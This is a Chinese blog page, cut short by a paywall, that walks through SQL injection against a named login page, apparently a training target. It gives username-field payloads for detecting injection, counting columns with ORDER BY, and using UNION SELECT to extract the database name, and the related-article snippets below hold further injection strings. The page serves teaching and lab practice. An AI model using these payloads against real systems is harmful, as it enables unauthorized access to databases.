union联合注入以及sql盲注实战

最新推荐文章于 2024-03-28 19:51:31 发布
最新推荐文章于 2024-03-28 19:51:31 发布
阅读量750 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37799526/article/details/104391116
版权

任务1------对http://yun.zhiliaotang.com:40008/login.html进行联合注入攻击

步骤如下:

1.判断注入点是否存在

步骤如下:
	1.在用户名栏输入1'				// 报数据库查询出错
	2.在用户名栏输入1' or 1=1 -- 	// 正常登陆
	3.在用户名栏输入1' or 1=2 --	// 出错
由此判断该处user参数为注入点

2.判断字段

步骤如下:
	1.在用户名栏输入1' or 1=1 order by 1 -- 	//登陆成功
	2.在用户名栏输入1' or 1=1 order by 2 --		//登陆成功
	3.在用户名栏输入1' or 1=1 order by 3 --		//登陆成功
	4.在用户名栏输入1' or 1=1 order by 4 --		//报数据库查询出错
由此判断字段数为3

3.判断输出位置

步骤如下:
	1.在用户名栏输入1'  union select 1,2,3 -- //页面输出一个二
由此判断输出位置为2

4.爆库名

步骤如下:
	1.在用户名栏输入1' union select 1,database(),3 -- //输出数据库名为grade
*******************************************************************************
*******************************
最低0.47元/天 解锁文章
麦芽糖吖!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
union联合注入
m0_60945802的博客
03-21 4889
union联合注入
sql注入union联合注入
kingdring的博客
11-14 1万+
ps:21号祥云杯,为了避免连到都签不上,临时抱一波佛脚。 声明1:本文章使用的数据皆为官网公示,为保护信息已做打码 声明2:此系列文章仅用于CTF学习及信息安全防御技术,建议读者应用之前在 本地 搭建数据库或靶场等实践环境,在公网使用相关技术前请通读 《网络安全法》 union联合注入 上一篇大致说了sql注入的一些基本原理,这一篇说一说union的相关内容 联合查询 啥是联合查询 select a from b union select c from d where e; 大致就是这样 显然union
union 联合注入
jiaohuadehuli的博客
11-29 2823
墨者学院 SQL注入靶场 本篇文章为sql注入中最基础的union联合注入。 考察知识点: 掌握SQL注入原理 了解手工注入的方法; 了解MySQL的数据结构; 了解字符串的MD5加解密; 基础知识了解:
union 联合注入,以及SQL注入
最新发布
2303_81631620的博客
03-28 745
2.输入x’ and ‘1’='1,对应的Sql 语句:select * from table where id = ‘x’ and ‘1’=‘1’,语法正确,逻辑判断正确,所以返回正确。2.加and 1=1,如输入1 and 1=1,对应的sql:select * from table where id=1’ and 1=1 没有语法错误且逻辑判断为正确,所以返回正常。3.输入x’and ‘1’='2,对应的Sql 语句:select * from where id = ‘x’ and ‘1’=‘2’,
[SQL注入学习]针对union盲注的一次实验
热门推荐
Y4tacker的博客
10-20 2万+
前言:实验复现思路来自安全先师,感谢师傅的思路 文章目录利用方式如何利用 利用方式 case when 15 like '1%' then 0 else 2*1e308 end 当把输入参数当中的()替换为[]时,函数无法执行,可以看下面两张测试截图 如何利用 这里php本地环境出问题了就直接在navicat 里面演示,注意str4下面的值,首先在information_schema.SCHEMATA表当中查询第一个数据库名为information_schema 当错误时显示2 正确时显示3
SQL注入union 联合注入
weixin_53711701的博客
01-16 4234
SQL注入union联合注入
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
超级SQL注入工具,支持布尔盲注,报错盲注union注入
03-27
超级SQL注入工具目前支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
SQL学习笔记六 union联合结果集使用
09-11
SQL学习笔记六 union联合结果集使用,需要的朋友可以参考下。
CTF中几种通用的sql盲注手法和注入的一些tips1
08-03
2、使场景 2、使场景 2、原理分析 3、使场景 2、regexp 盲注是来实验吧道注题 3、union 盲注利起来较简单,就是利上说的那些条件进注,例是来蓝鲸
SQL注入系列篇之union联合注入
d59hao的博客
04-27 694
union注入攻击,通过unionunion all连接,将自己写的SQL拼接到原始SQL中,从而达到执行任意SQL语句的效果。
sql注入-union注入union函数 联合注入
07-11 7242
union注入】可与报错注入盲注、堆叠注入等方法结合使用
冲击红队第十五天 - union 联合注入
在下小黄的博客
10-06 1834
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 如若转载请注明出处 ,!!!! 今天更新的是: 冲击红队第十五天 - union 联合注入 创建时间:2021年10月6日 冲击红队第十五天 - union 联合注入一、union 联合注入原理举个例子:举个例子:union 联合注入原理:union 联合注入原理:拿 SQLi - labs 1 题目做个演示: 一、union 联合注入原理 联合查询注入联合两个表进行注入攻击,使用关键词 union selec
SQL 注入漏洞(五)union 联合注入
不秃头的程序Yang
06-11 1928
1、联合查询的错误方式 4、联合查询注入获取敏感信息 6、通过 information_schema 获取表
Union注入
shenzhang7331的博客
11-18 208
1.http://*id=31 order by 6 注:若6页面正常,7页面不正常,说明有6个字段 2.http://*id=31 and 1=2 union select 1,2,3,4,5,6 注:定位报错字段,若页面显示3 3.http://*id=31 and 1=2 union select 1,2,database(),4,5,6 from information_sch...
实验10:union注入
qq_44720671的博客
03-31 264
基于union联合查询信息获取 union联合查询:可通过联合查询来查询指定数据 例:select username,password from user where id=1 union select 字段1,字段2 from 表名.。 【注:联合查询的字段数要和主查询一致!!!】 【查询字段扩展:version()数据库版本,database()当前的数据库名,user()用户名】 我们以Pi...
Mysql注入union联合注入、报错注入、布尔盲注、时间盲注
Thunderclap的博客
11-14 4935
Union联合注入 union联合注入第一步 判断是否存在注入,判断注入点类型 1 and 1=1-- (整型) 1 and 1=2-- (整型) 1’ or ‘1’='1 (字符型) 1’ or ‘1’ = '2 (字符型) 表示:如果用户可控的传值位置不在末尾,那么#以后的sql语句会注释掉,不进行编译 and 表示:and两边都为真时,那么结果为真,返回正确结果,反之返回false or表示:or两边只要有一边为真,那么结果为真,返回正确结果,反之返回false 获取数据库中信息:判断列数 1
Less 11-12(基于POST-union注入
老司机开代码的博客
08-03 367
文章目录POST注入1. 题目分析2. 开始注入less-12 POST注入 这次,我们接触到了之前从未接触过的POST注入。 先看一下题目: 哇,好新颖,这次页面上有框框啦。 1. 题目分析 首先我们还是要先分析一下题目。 先随便输入一些东西看看。 页面提示你登陆尝试失败。。。说明这个username和password是不能随便输入的。 那么根据之前的经验,我们试一下admin 可以看到,...
sql-labs靶场练习
m0_74097148的博客
03-04 385
这一关开始发现是post传参,是在输入框中输入,但总体思路不变一般POST型使用1' or 1=1 -- #和1" or 1=1 -- # 来判断闭合方式,成功的概率最大因单双引号引起的闭合问题更大点判断注入类型发现是字符型判断闭合方式(发现是单引号闭合)判断字段数(发现是两列)判断回显位(发现两列均可以回显) 判断数据库名 爆出表名 爆出列名 爆出用户名和密码采用“1\”直接爆出闭合方式为:(" ")判断字段数(发现是两列)如图是回显位爆出数据库名,语句和lese-1一样,闭合方式换换就可以了这关只有登录
sql注入union盲注
07-28
回答: SQL注入盲注可以分为三类:布尔盲注、延时盲注和报错盲注。其中,布尔盲注是一种通过构造逻辑表达式的SQL语句来判断数据的具体内容的盲注方式。在布尔盲注中,页面在执行SQL语句后,只显示两种结果,通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值